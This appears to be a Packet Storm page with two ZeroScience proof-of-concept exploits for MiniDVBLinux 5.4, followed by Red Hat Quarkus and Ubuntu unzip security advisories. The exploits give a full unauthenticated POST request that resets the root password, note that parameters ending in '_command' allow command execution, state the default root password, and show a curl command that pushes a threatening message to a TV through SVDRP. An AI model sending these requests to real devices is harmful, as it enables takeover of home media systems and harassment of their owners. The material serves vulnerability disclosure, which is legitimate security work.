MiniDVBLinux versions 5.4 and below root password changing proof of concept exploit.

    MiniDVBLinux 5.4 Change Root Password PoCVendor: MiniDVBLinuxProduct web page: https://www.minidvblinux.deAffected version: <=5.4Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simpleway to convert a standard PC into a Multi Media Centre based on theVideo Disk Recorder (VDR) by Klaus Schmidinger. Features of thisLinux based Digital Video Recorder: Watch TV, Timer controlledrecordings, Time Shift, DVD and MP3 Replay, Setup and configurationvia browser, and a lot more. MLD strives to be as small as possible,modular, simple. It supports numerous hardware platforms, like classicdesktops in 32/64bit and also various low power ARM systems.Desc: The application allows a remote attacker to change the rootpassword of the system without authentication (disabled by default)and verification of previously assigned credential. Command executionalso possible using several POST parameters.Tested on: MiniDVBLinux 5.4           BusyBox v1.25.1           Architecture: armhf, armhf-rpi2           GNU/Linux 4.19.127.203 (armv7l)           VideoDiskRecorder 2.4.6Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5715Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php24.09.2022--Default root password: mld500Change system password:-----------------------POST /?site=setup&section=System HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6Cache-Control: max-age=0Connection: keep-aliveContent-Length: 778Content-Type: application/x-www-form-urlencodedCookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfbaHost: ip:8008Origin: http://ip:8008Referer: http://ip:8008/?site=setup&section=SystemUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-gpc: 1APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+Pretty post data:APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: r00tBUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/KumanovoKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1action: saveparams: changed: SYSTEM_PASSWORD Eenable webif password check:-----------------------------POST /?site=setup&section=System HTTP/1.1APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/BerlinKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1WEBIF_PASSWORD_CHECK: 1action: saveparams: changed: WEBIF_PASSWORD_CHECK Disable webif password check:-----------------------------POST /?site=setup&section=System HTTP/1.1APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/BerlinKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1action: saveparams: changed: WEBIF_PASSWORD_CHECK

MiniDVBLinux 5.4 Change Root Password

MiniDVBLinux versions 5.4 and below allows the usage of the SVDRP protocol/commands to be sent by a remote attacker to manipulate and/or remotely control the TV.

    MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) ExploitVendor: MiniDVBLinuxProduct web page: https://www.minidvblinux.deAffected version: <=5.4Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simpleway to convert a standard PC into a Multi Media Centre based on theVideo Disk Recorder (VDR) by Klaus Schmidinger. Features of thisLinux based Digital Video Recorder: Watch TV, Timer controlledrecordings, Time Shift, DVD and MP3 Replay, Setup and configurationvia browser, and a lot more. MLD strives to be as small as possible,modular, simple. It supports numerous hardware platforms, like classicdesktops in 32/64bit and also various low power ARM systems.Desc: The application allows the usage of the SVDRP protocol/commandsto be sent by a remote attacker to manipulate and/or control remotelythe TV.Tested on: MiniDVBLinux 5.4           BusyBox v1.25.1           Architecture: armhf, armhf-rpi2           GNU/Linux 4.19.127.203 (armv7l)           VideoDiskRecorder 2.4.6Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5714Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php24.09.2022--Send a message to the TV screen:curl http://ip:8008/?site=commands&section=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU!220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8250 Message queued221 mld closing connectionFor more commands: - https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands

MiniDVBLinux 5.4 SVDRP Control

Red Hat Security Advisory 2022-6941-01 - This release of Red Hat build of Quarkus 2.7.6.SP1 includes security updates, bug fixes, and enhancements. For more information, see the release notes page listed in the References section. Issues addressed include a denial of service vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256====================================================================                   Red Hat Security AdvisorySynopsis:          Important: Red Hat build of Quarkus Platform 2.7.6.SP1 and security updateAdvisory ID:       RHSA-2022:6941-01Product:           Red Hat build of QuarkusAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:6941Issue date:        2022-10-13CVE Names:         CVE-2022-25857====================================================================1. Summary:An update is now available for the Red Hat build of Quarkus Platform.Red Hat Product Security has rated this update as having a security impactof Important. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for eachvulnerability. For more information, see the CVE links in the Referencessection.2. Description:This release of Red Hat build of Quarkus 2.7.6.SP1 (Service Pack 1)includes security updates, bug fixes, and enhancements. For moreinformation, see the release notes page listed in the References section.Security Fix(es):* snakeyaml: Denial of Service due to missing nested depth limitation forcollections (CVE-2022-25857)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.3. Solution:Before applying the update, back up your existing installation, includingall applications, configuration files, databases and database settings, andso on.The References section of this erratum contains a download link for theupdate. You must be logged in to download the update.4. Bugs fixed (https://bugzilla.redhat.com/):2126789 - CVE-2022-25857 snakeyaml: Denial of Service due to missing nested depth limitation for collections5. References:https://access.redhat.com/security/cve/CVE-2022-25857https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/articles/4966181https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=redhat.quarkus&version=2.7.6.SP1https://access.redhat.com/documentation/en-us/red_hat_build_of_quarkus/2.76. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2022 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBY0gnI9zjgjWX9erEAQgR0A/+NjSPoaHYJeEnfyeRnIf1M+zqnwljZ4rzmk6SZkqkFV4NWOlBIFQz5WhXvbs3DK0mx3FPlfisTybODHgYfrkV7D3IUq0rS4auM2owZPnwT0GLnMgeNAq+8yT1ZGZ/d54AW3UF30A1UePoKU9WbfMmVPHdITeu2Rl1hA1bC+opn9eF0OvCPWFbC9XlqHX4Dy04HNg4OSCY8AkIcH4ULg72sEwuTnAq9jlyHqF37FvxHr05OUoTlfxelxtye9fSjT2uyLHzn1uvnMbcPNX3l/YVNdcGu8Kq1hKpnUW2735YaghlCzJUu7wzSh3tRqm1Zbq7VzZi1NGzeeSabBlosaqe9rNq4cF+t0eVORm5ORKpW8jflj4+DLhFUj6/D2TfcKxPylH5qLlVaLK2ly2wirwX3N9N15L6gRb2NmhEBfvT30UOz+mjJyfkDGpGdO8uNSG094+HP9En8ekxIFzJs3khb7d1TeHOiGfuCcMvgCx/sCCxTfZXfD57XXA6A1wVzBPy7PKXuIs5HjEFrCIlkkuJ9rc6Tq93jy+cB++OTydsJg/3Q2Z9EnOBw/OPJbcAAzwLSNy3rznzc5nGuO5Pnr4Z7pJPH/D2xkH+EIECFbqBvY0kdO2k9ILl2C4VUrJYHB9BmUxoMHaVYWY9vRzu9ZS+dqGH0cvnUhyP58tlMzB+dBY=gVq4-----END PGP SIGNATURE-------RHSA-announce mailing listRHSA-announce@redhat.comhttps://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6941-01

Ubuntu Security Notice 5673-1 - It was discovered that unzip did not properly handle unicode strings under certain circumstances. If a user were tricked into opening a specially crafted zip file, an attacker could possibly use this issue to cause unzip to crash, resulting in a denial of service, or possibly execute arbitrary code. It was discovered that unzip did not properly perform bounds checking while converting wide strings to local strings. If a user were tricked into opening a specially crafted zip file, an attacker could possibly use this issue to cause unzip to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5673-1October 13, 2022unzip vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:Several security issues were fixed in unzip.Software Description:- unzip: De-archiver for .zip filesDetails:It was discovered that unzip did not properly handle unicode strings undercertain circumstances. If a user were tricked into opening a specially craftedzip file, an attacker could possibly use this issue to cause unzip to crash,resulting in a denial of service, or possibly execute arbitrary code. (CVE-2021-4217)It was discovered that unzip did not properly perform bounds checking whileconverting wide strings to local strings. If a user were tricked into opening aspecially crafted zip file, an attacker could possibly use this issue to causeunzip to crash, resulting in a denial of service, or possibly execute arbitrarycode. (CVE-2022-0529, CVE-2022-0530)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  unzip                           6.0-26ubuntu3.1Ubuntu 20.04 LTS:  unzip                           6.0-25ubuntu1.1Ubuntu 18.04 LTS:  unzip                           6.0-21ubuntu1.2Ubuntu 16.04 ESM:  unzip                           6.0-20ubuntu1.1+esm1Ubuntu 14.04 ESM:  unzip                           6.0-9ubuntu1.6+esm1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5673-1  CVE-2021-4217, CVE-2022-0529, CVE-2022-0530, https://launchpad.net/bugs/1957077Package Information:  https://launchpad.net/ubuntu/+source/unzip/6.0-26ubuntu3.1  https://launchpad.net/ubuntu/+source/unzip/6.0-25ubuntu1.1  https://launchpad.net/ubuntu/+source/unzip/6.0-21ubuntu1.2

Source

Packet Storm